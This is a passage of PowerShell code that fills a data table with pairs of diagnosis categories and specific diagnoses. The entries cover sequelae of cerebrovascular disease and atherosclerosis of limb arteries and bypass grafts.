unspecified side") + $null = $DiagnosisList.Rows.Add("Other sequelae of cerebral infarction","Apraxia following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Other sequelae of cerebral infarction","Dysphagia following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Other sequelae of cerebral infarction","Facial weakness following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Other sequelae of cerebral infarction","Ataxia following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Other sequelae of cerebral infarction","Other sequelae of cerebral infarction") + $null = $DiagnosisList.Rows.Add("Sequelae of other cerebrovascular diseases","Unspecified sequelae of other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Attention and concentration deficit following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Memory deficit following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Visuospatial deficit and spatial neglect following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Psychomotor deficit following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Frontal lobe and executive function deficit following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Cognitive social or emotional deficit following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Other symptoms and signs involving cognitive functions following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other cerebrovascular disease","Unspecified symptoms and signs involving cognitive functions following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other cerebrovascular disease","Aphasia following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other cerebrovascular disease","Dysphasia following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other cerebrovascular disease","Dysarthria following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other cerebrovascular disease","Fluency disorder following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other cerebrovascular disease","Other speech and language deficits following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other cerebrovascular disease","Monoplegia of upper limb following other cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other cerebrovascular disease","Monoplegia of upper limb following other cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other cerebrovascular disease","Monoplegia of upper limb following other cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other cerebrovascular disease","Monoplegia of upper limb following other cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other cerebrovascular disease","Monoplegia of upper limb following other cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other cerebrovascular disease","Monoplegia of lower limb following other cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other cerebrovascular disease","Monoplegia of lower limb following other cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other cerebrovascular disease","Monoplegia of lower limb following other cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other cerebrovascular disease","Monoplegia of lower limb following other cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other cerebrovascular disease","Monoplegia of lower limb following other cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other cerebrovascular disease","Hemiplegia and hemiparesis following other cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other cerebrovascular disease","Hemiplegia and hemiparesis following other cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other cerebrovascular disease","Hemiplegia and hemiparesis following other cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other cerebrovascular disease","Hemiplegia and hemiparesis following other cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other cerebrovascular disease","Hemiplegia and hemiparesis following other cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other cerebrovascular disease","Other paralytic syndrome following other cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other cerebrovascular disease","Other paralytic syndrome following other cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other cerebrovascular disease","Other paralytic syndrome following other cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other cerebrovascular disease","Other paralytic syndrome following other cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other cerebrovascular disease","Other paralytic syndrome following other cerebrovascular disease, bilateral") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other cerebrovascular disease","Other paralytic syndrome following other cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other sequelae of other cerebrovascular disease","Apraxia following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of other cerebrovascular disease","Dysphagia following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of other cerebrovascular disease","Facial weakness following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of other cerebrovascular disease","Ataxia following other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of other cerebrovascular disease","Other sequelae of other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Sequelae of unspecified cerebrovascular diseases","Unspecified sequelae of unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Attention and concentration deficit following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Memory deficit following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Visuospatial deficit and spatial neglect following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Psychomotor deficit following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Frontal lobe and executive function deficit following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Cognitive social or emotional deficit following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Other symptoms and signs involving cognitive functions following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following unspecified cerebrovascular disease","Unspecified symptoms and signs involving cognitive functions following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following unspecified cerebrovascular disease","Aphasia following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following unspecified cerebrovascular disease","Dysphasia following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following unspecified cerebrovascular disease","Dysarthria following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following unspecified cerebrovascular disease","Fluency disorder following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following unspecified cerebrovascular disease","Other speech and language deficits following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following unspecified cerebrovascular disease","Monoplegia of upper limb following unspecified cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following unspecified cerebrovascular disease","Monoplegia of upper limb following unspecified cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following unspecified cerebrovascular disease","Monoplegia of upper limb following unspecified cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following unspecified cerebrovascular disease","Monoplegia of upper limb following unspecified cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following unspecified cerebrovascular disease","Monoplegia of upper limb following unspecified cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following unspecified cerebrovascular disease","Monoplegia of lower limb following unspecified cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following unspecified cerebrovascular disease","Monoplegia of lower limb following unspecified cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following unspecified cerebrovascular disease","Monoplegia of lower limb following unspecified cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following unspecified cerebrovascular disease","Monoplegia of lower limb following unspecified cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following unspecified cerebrovascular disease","Monoplegia of lower limb following unspecified cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following unspecified cerebrovascular disease","Hemiplegia and hemiparesis following unspecified cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following unspecified cerebrovascular disease","Hemiplegia and hemiparesis following unspecified cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following unspecified cerebrovascular disease","Hemiplegia and hemiparesis following unspecified cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following unspecified cerebrovascular disease","Hemiplegia and hemiparesis following unspecified cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following unspecified cerebrovascular disease","Hemiplegia and hemiparesis following unspecified cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following unspecified cerebrovascular disease","Other paralytic syndrome following unspecified cerebrovascular disease affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following unspecified cerebrovascular disease","Other paralytic syndrome following unspecified cerebrovascular disease affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following unspecified cerebrovascular disease","Other paralytic syndrome following unspecified cerebrovascular disease affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following unspecified cerebrovascular disease","Other paralytic syndrome following unspecified cerebrovascular disease affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following unspecified cerebrovascular disease","Other paralytic syndrome following unspecified cerebrovascular disease, bilateral") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following unspecified cerebrovascular disease","Other paralytic syndrome following unspecified cerebrovascular disease affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other sequelae of unspecified cerebrovascular disease","Apraxia following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of unspecified cerebrovascular disease","Dysphagia following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of unspecified cerebrovascular disease","Facial weakness following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of unspecified cerebrovascular disease","Ataxia following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Other sequelae of unspecified cerebrovascular disease","Other sequelae following unspecified cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Atherosclerosis","Atherosclerosis of aorta") + $null = $DiagnosisList.Rows.Add("Atherosclerosis","Atherosclerosis of renal artery") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of native arteries of extremities","Unspecified atherosclerosis of native arteries of extremities, right leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of native arteries of extremities","Unspecified atherosclerosis of native arteries of extremities, left leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of native arteries of extremities","Unspecified atherosclerosis of native arteries of extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of native arteries of extremities","Unspecified atherosclerosis of native arteries of extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of native arteries of extremities","Unspecified atherosclerosis of native arteries of extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with intermittent claudication","Atherosclerosis of native arteries of extremities with intermittent claudication, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with intermittent claudication","Atherosclerosis of native arteries of extremities with intermittent claudication, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with intermittent claudication","Atherosclerosis of native arteries of extremities with intermittent claudication, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with intermittent claudication","Atherosclerosis of native arteries of extremities with intermittent claudication, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with intermittent claudication","Atherosclerosis of native arteries of extremities with intermittent claudication, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with rest pain","Atherosclerosis of native arteries of extremities with rest pain, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with rest pain","Atherosclerosis of native arteries of extremities with rest pain, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with rest pain","Atherosclerosis of native arteries of extremities with rest pain, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with rest pain","Atherosclerosis of native arteries of extremities with rest pain, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with rest pain","Atherosclerosis of native arteries of extremities with rest pain, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of right leg with ulceration","Atherosclerosis of native arteries of right leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of right leg with ulceration","Atherosclerosis of native arteries of right leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of right leg with ulceration","Atherosclerosis of native arteries of right leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of right leg with ulceration","Atherosclerosis of native arteries of right leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of right leg with ulceration","Atherosclerosis of native arteries of right leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of right leg with ulceration","Atherosclerosis of native arteries of right leg with ulceration of other part of lower right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of right leg with ulceration","Atherosclerosis of native arteries of right leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of left leg with ulceration","Atherosclerosis of native arteries of left leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of left leg with ulceration","Atherosclerosis of native arteries of left leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of left leg with ulceration","Atherosclerosis of native arteries of left leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of left leg with ulceration","Atherosclerosis of native arteries of left leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of left leg with ulceration","Atherosclerosis of native arteries of left leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of left leg with ulceration","Atherosclerosis of native arteries of left leg with ulceration of other part of lower left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of left leg with ulceration","Atherosclerosis of native arteries of left leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of other extremities with ulceration","Atherosclerosis of native arteries of other extremities with ulceration") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with gangrene","Atherosclerosis of native arteries of extremities with gangrene, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with gangrene","Atherosclerosis of native arteries of extremities with gangrene, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with gangrene","Atherosclerosis of native arteries of extremities with gangrene, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with gangrene","Atherosclerosis of native arteries of extremities with gangrene, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native arteries of extremities with gangrene","Atherosclerosis of native arteries of extremities with gangrene, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of native arteries of extremities","Other atherosclerosis of native arteries of extremities, right leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of native arteries of extremities","Other atherosclerosis of native arteries of extremities, left leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of native arteries of extremities","Other atherosclerosis of native arteries of extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of native arteries of extremities","Other atherosclerosis of native arteries of extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of native arteries of extremities","Other atherosclerosis of native arteries of extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities","Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities","Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities","Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities","Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities","Unspecified atherosclerosis of unspecified type of bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with intermittent claudication, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with rest pain, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the right leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of the left leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of other extremity with ulceration","Atherosclerosis of unspecified type of bypass graft(s) of other extremity with ulceration") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of unspecified type of bypass graft(s) of the extremities with gangrene, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of unspecified type of bypass graft(s) of the extremities","Other atherosclerosis of unspecified type of bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of unspecified type of bypass graft(s) of the extremities","Other atherosclerosis of unspecified type of bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of unspecified type of bypass graft(s) of the extremities","Other atherosclerosis of unspecified type of bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of unspecified type of bypass graft(s) of the extremities","Other atherosclerosis of unspecified type of bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of unspecified type of bypass graft(s) of the extremities","Other atherosclerosis of unspecified type of bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities","Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities","Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities","Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities","Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities","Unspecified atherosclerosis of autologous vein bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of autologous vein bypass graft(s) of the extremities with intermittent claudication, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain","Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain","Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain","Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain","Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain","Atherosclerosis of autologous vein bypass graft(s) of the extremities with rest pain, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the right leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the left leg with 